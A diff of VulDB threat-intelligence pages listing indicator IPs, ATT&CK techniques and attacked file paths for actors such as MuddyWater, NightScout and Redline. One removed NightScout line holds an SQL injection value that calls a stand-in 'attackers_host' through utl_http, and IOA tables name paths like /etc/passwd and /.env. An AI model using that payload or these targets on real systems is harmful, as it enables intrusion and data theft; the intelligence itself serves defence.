@ -25,11 +25,9 @@ ID | IP address | Hostname | Confidence
|
|||
1 | 58.64.201.229 | - | High
|
||||
2 | 98.126.91.66 | - | High
|
||||
3 | 113.65.22.148 | - | High
|
||||
4 | 113.65.41.28 | - | High
|
||||
5 | 113.65.43.42 | - | High
|
||||
6 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 10 more IOC items available. Please use our online service to access the data.
|
||||
There are 12 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -59,9 +57,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Monarchy - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Monarchy](https://vuldb.com/?actor.monarchy). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Monarchy](https://vuldb.com/?actor.monarchy). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.monarchy](https://vuldb.com/?actor.monarchy)
|
||||
|
||||
|
@ -16,13 +16,21 @@ These indicators of compromise indicate associated network ressources which are
|
|||
|
||||
ID | IP address | Hostname | Confidence
|
||||
-- | ---------- | -------- | ----------
|
||||
1 | 45.76.47.218 | - | High
|
||||
1 | 45.76.47.218 | 45.76.47.218.vultr.com | Medium
|
||||
2 | 134.122.87.198 | - | High
|
||||
3 | 178.128.163.233 | gpsurgerydatabase-staging.assura.uk | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 1 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
These indicators of attack list the potential fragments used for technical activities like reconnaissance, exploitation, privilege escalation, and exfiltration by Monarchy. This data is unique as it uses our predictive model for actor profiling.
|
||||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `ContactSelectionActivity.java` | High
|
||||
|
||||
## References
|
||||
|
||||
The following list contains external sources which discuss the actor and the associated activities:
|
||||
|
@ -33,9 +41,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -28,4 +28,4 @@ The following articles explain our unique predictive cyber threat intelligence:
|
|||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# MuddyWater - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [MuddyWater](https://vuldb.com/?actor.muddywater). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [MuddyWater](https://vuldb.com/?actor.muddywater). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.muddywater](https://vuldb.com/?actor.muddywater)
|
||||
|
||||
|
@ -34,13 +34,9 @@ ID | IP address | Hostname | Confidence
|
|||
4 | 38.132.99.167 | - | High
|
||||
5 | 46.99.148.96 | - | High
|
||||
6 | 66.219.22.235 | core96.hostingmadeeasy.com | High
|
||||
7 | 78.129.139.134 | der134.creditloanlenders.com | High
|
||||
8 | 78.129.139.147 | - | High
|
||||
9 | 78.129.139.148 | - | High
|
||||
10 | 78.129.222.56 | - | High
|
||||
11 | ... | ... | ...
|
||||
7 | ... | ... | ...
|
||||
|
||||
There are 18 more IOC items available. Please use our online service to access the data.
|
||||
There are 22 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -51,10 +47,9 @@ ID | Technique | Description | Confidence
|
|||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | T1211 | 7PK Security Features | High
|
||||
5 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 7 more TTP items available. Please use our online service to access the data.
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -64,17 +59,30 @@ ID | Type | Indicator | Confidence
|
|||
-- | ---- | --------- | ----------
|
||||
1 | File | `%PROGRAMFILES%\MyQ\PHP\Sessions\` | High
|
||||
2 | File | `/.env` | Low
|
||||
3 | File | `/etc/ajenti/config.yml` | High
|
||||
4 | File | `/etc/passwd` | Medium
|
||||
5 | File | `/login` | Low
|
||||
6 | File | `/movie.php` | Medium
|
||||
7 | File | `/nagiosxi/admin/graphtemplates.php` | High
|
||||
8 | File | `/phppath/php` | Medium
|
||||
9 | File | `/search_events.php` | High
|
||||
10 | File | `/StartingPage/link_req_2.php` | High
|
||||
11 | ... | ... | ...
|
||||
3 | File | `/.flatpak-info` | High
|
||||
4 | File | `/etc/ajenti/config.yml` | High
|
||||
5 | File | `/etc/passwd` | Medium
|
||||
6 | File | `/login` | Low
|
||||
7 | File | `/movie.php` | Medium
|
||||
8 | File | `/nagiosxi/admin/graphtemplates.php` | High
|
||||
9 | File | `/phppath/php` | Medium
|
||||
10 | File | `/search_events.php` | High
|
||||
11 | File | `/StartingPage/link_req_2.php` | High
|
||||
12 | File | `/usr/bin/pkexec` | High
|
||||
13 | File | `/ViewUserHover.jspa` | High
|
||||
14 | File | `abook_database.php` | High
|
||||
15 | File | `admin.php` | Medium
|
||||
16 | File | `admin/admin.shtml` | High
|
||||
17 | File | `admin/AJAX_lookup_handler.php` | High
|
||||
18 | File | `admin/bitrix.xscan_worker.php` | High
|
||||
19 | File | `admin/config.php` | High
|
||||
20 | File | `admin/general.php` | High
|
||||
21 | File | `admin/login.asp` | High
|
||||
22 | File | `admin/movieedit.php` | High
|
||||
23 | File | `affich.php` | Medium
|
||||
24 | ... | ... | ...
|
||||
|
||||
There are 197 more IOA items available. Please use our online service to access the data.
|
||||
There are 196 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -92,9 +100,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -87,7 +87,7 @@ ID | Type | Indicator | Confidence
|
|||
19 | File | `ajax/api/hook/decodeArguments` | High
|
||||
20 | ... | ... | ...
|
||||
|
||||
There are 164 more IOA items available. Please use our online service to access the data.
|
||||
There are 165 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# NightScout - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [NightScout](https://vuldb.com/?actor.nightscout). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [NightScout](https://vuldb.com/?actor.nightscout). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.nightscout](https://vuldb.com/?actor.nightscout)
|
||||
|
||||
|
@ -48,12 +48,9 @@ ID | Type | Indicator | Confidence
|
|||
1 | File | `/+CSCOE+/logon.html` | High
|
||||
2 | File | `/cgi-bin/wapopen` | High
|
||||
3 | File | `iesfootprint.jsp` | High
|
||||
4 | File | `login_meeting.cgi` | High
|
||||
5 | Library | `ContentStore/Base/CVDataPipe.dll` | High
|
||||
6 | Argument | `FILECAMERA` | Medium
|
||||
7 | Argument | `src` | Low
|
||||
8 | Input Value | `../..` | Low
|
||||
9 | Input Value | `11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) --` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 6 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -65,9 +62,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# PakistanChatMessenger - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [PakistanChatMessenger](https://vuldb.com/?actor.pakistanchatmessenger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [PakistanChatMessenger](https://vuldb.com/?actor.pakistanchatmessenger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.pakistanchatmessenger](https://vuldb.com/?actor.pakistanchatmessenger)
|
||||
|
||||
|
@ -9,6 +9,7 @@ Live data and more analysis capabilities are available at [https://vuldb.com/?ac
|
|||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with PakistanChatMessenger:
|
||||
|
||||
* US
|
||||
* CN
|
||||
* DE
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
@ -50,12 +51,13 @@ ID | Type | Indicator | Confidence
|
|||
5 | File | `/list_temp_photo_pin_upload.php` | High
|
||||
6 | File | `/searchpin.php` | High
|
||||
7 | File | `/show_group_members.php` | High
|
||||
8 | File | `admin/adduser.php` | High
|
||||
9 | File | `admin\model\catalog\download.php` | High
|
||||
10 | File | `authcfg.cgi` | Medium
|
||||
11 | ... | ... | ...
|
||||
8 | File | `/sqfs/bin/sccd` | High
|
||||
9 | File | `admin/adduser.php` | High
|
||||
10 | File | `admin\model\catalog\download.php` | High
|
||||
11 | File | `authcfg.cgi` | Medium
|
||||
12 | ... | ... | ...
|
||||
|
||||
There are 91 more IOA items available. Please use our online service to access the data.
|
||||
There are 94 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -67,9 +69,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# PittyTiger - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [PittyTiger](https://vuldb.com/?actor.pittytiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [PittyTiger](https://vuldb.com/?actor.pittytiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.pittytiger](https://vuldb.com/?actor.pittytiger)
|
||||
|
||||
|
@ -29,17 +29,9 @@ ID | IP address | Hostname | Confidence
|
|||
10 | 58.61.40.5 | 5.40.61.58.broad.sz.gd.dynamic.163data.com.cn | High
|
||||
11 | 58.64.175.191 | - | High
|
||||
12 | 58.64.175.255 | - | High
|
||||
13 | 58.64.177.60 | - | High
|
||||
14 | 58.64.185.200 | - | High
|
||||
15 | 58.64.185.255 | - | High
|
||||
16 | 59.53.91.33 | - | High
|
||||
17 | 59.120.84.230 | 59-120-84-230.hinet-ip.hinet.net | High
|
||||
18 | 59.123.255.255 | 59-123-255-255.dynamic-ip.hinet.net | High
|
||||
19 | 61.145.112.78 | - | High
|
||||
20 | 61.220.44.244 | 61-220-44-244.hinet-ip.hinet.net | High
|
||||
21 | ... | ... | ...
|
||||
13 | ... | ... | ...
|
||||
|
||||
There are 40 more IOC items available. Please use our online service to access the data.
|
||||
There are 48 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -48,6 +40,8 @@ Tactics, techniques, and procedures summarize the suspected ATT&CK techniques us
|
|||
ID | Technique | Description | Confidence
|
||||
-- | --------- | ----------- | ----------
|
||||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1499 | Resource Consumption | High
|
||||
3 | T1587.003 | Improper Certificate Validation | High
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -57,10 +51,10 @@ ID | Type | Indicator | Confidence
|
|||
-- | ---- | --------- | ----------
|
||||
1 | File | `/cgi-bin/go` | Medium
|
||||
2 | File | `/cgi-bin/portal` | High
|
||||
3 | File | `kbdint.c` | Medium
|
||||
4 | File | `wp-admin/admin-post.php?swp_debug=load_options` | High
|
||||
5 | Argument | `ACTION` | Low
|
||||
6 | Argument | `swp_url` | Low
|
||||
3 | File | `admin/conf_users_edit.php` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 5 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -73,9 +67,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Redline - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Redline](https://vuldb.com/?actor.redline). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Redline](https://vuldb.com/?actor.redline). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.redline](https://vuldb.com/?actor.redline)
|
||||
|
||||
|
@ -13,7 +13,7 @@ These countries are directly (e.g. origin of attacks) or indirectly (e.g. access
|
|||
* TR
|
||||
* ...
|
||||
|
||||
There are 9 more country items available. Please use our online service to access the data.
|
||||
There are 10 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -31,19 +31,14 @@ ID | IP address | Hostname | Confidence
|
|||
8 | 23.23.104.250 | ec2-23-23-104-250.compute-1.amazonaws.com | Medium
|
||||
9 | 23.46.238.194 | a23-46-238-194.deploy.static.akamaitechnologies.com | High
|
||||
10 | 34.76.8.115 | 115.8.76.34.bc.googleusercontent.com | Medium
|
||||
11 | 37.46.150.90 | redflower.bar | High
|
||||
11 | 37.46.150.90 | - | High
|
||||
12 | 45.33.89.196 | li1035-196.members.linode.com | High
|
||||
13 | 45.67.231.50 | licher.lone.example.com | High
|
||||
14 | 45.84.0.108 | pangeransosmed.vip | High
|
||||
15 | 45.84.0.200 | 1c.capricorn.md | High
|
||||
16 | 45.128.150.68 | dok.com | High
|
||||
17 | 45.130.147.55 | - | High
|
||||
18 | 45.139.184.124 | vps150027.vpsville.ru | High
|
||||
19 | 45.146.164.230 | - | High
|
||||
20 | 46.29.114.16 | pointer.vps.house | High
|
||||
21 | ... | ... | ...
|
||||
16 | ... | ... | ...
|
||||
|
||||
There are 57 more IOC items available. Please use our online service to access the data.
|
||||
There are 62 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -54,10 +49,9 @@ ID | Technique | Description | Confidence
|
|||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | T1211 | 7PK Security Features | High
|
||||
5 | ... | ... | ...
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 7 more TTP items available. Please use our online service to access the data.
|
||||
There are 9 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -73,11 +67,34 @@ ID | Type | Indicator | Confidence
|
|||
6 | File | `/cgi-bin/supervisor/PwdGrp.cgi` | High
|
||||
7 | File | `/Config/SaveUploadedHotspotLogoFile` | High
|
||||
8 | File | `/dev/shm` | Medium
|
||||
9 | File | `/getcfg.php` | Medium
|
||||
10 | File | `/goform/RgUrlBlock.asp` | High
|
||||
11 | ... | ... | ...
|
||||
9 | File | `/dl/dl_print.php` | High
|
||||
10 | File | `/getcfg.php` | Medium
|
||||
11 | File | `/goform/RgUrlBlock.asp` | High
|
||||
12 | File | `/index.php` | Medium
|
||||
13 | File | `/info.asp` | Medium
|
||||
14 | File | `/info.xml` | Medium
|
||||
15 | File | `/jeecg-boot/sys/common/upload` | High
|
||||
16 | File | `/mc-admin/post.php?state=delete&delete` | High
|
||||
17 | File | `/product_list.php` | High
|
||||
18 | File | `/see_more_details.php` | High
|
||||
19 | File | `/ucms/chk.php` | High
|
||||
20 | File | `5.2.9\syscrb.exe` | High
|
||||
21 | File | `abc-pcie.c` | Medium
|
||||
22 | File | `adclick.php` | Medium
|
||||
23 | File | `addentry.php` | Medium
|
||||
24 | File | `addmember.php` | High
|
||||
25 | File | `addtocart.asp` | High
|
||||
26 | File | `addtomylist.asp` | High
|
||||
27 | File | `admin.php/admin/configset/index/group/upload.html` | High
|
||||
28 | File | `admin.x-shop.php` | High
|
||||
29 | File | `admin/auth.php` | High
|
||||
30 | File | `admin/category.inc.php` | High
|
||||
31 | File | `admin/config/confmgr.php` | High
|
||||
32 | File | `admin/import/class-import-settings.php` | High
|
||||
33 | File | `admin/user/group/update` | High
|
||||
34 | ... | ... | ...
|
||||
|
||||
There are 310 more IOA items available. Please use our online service to access the data.
|
||||
There are 292 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -93,9 +110,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Roaming Tiger - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Roaming Tiger](https://vuldb.com/?actor.roaming_tiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Roaming Tiger](https://vuldb.com/?actor.roaming_tiger). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.roaming_tiger](https://vuldb.com/?actor.roaming_tiger)
|
||||
|
||||
|
@ -41,9 +41,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Shell Crew - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Shell Crew](https://vuldb.com/?actor.shell_crew). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
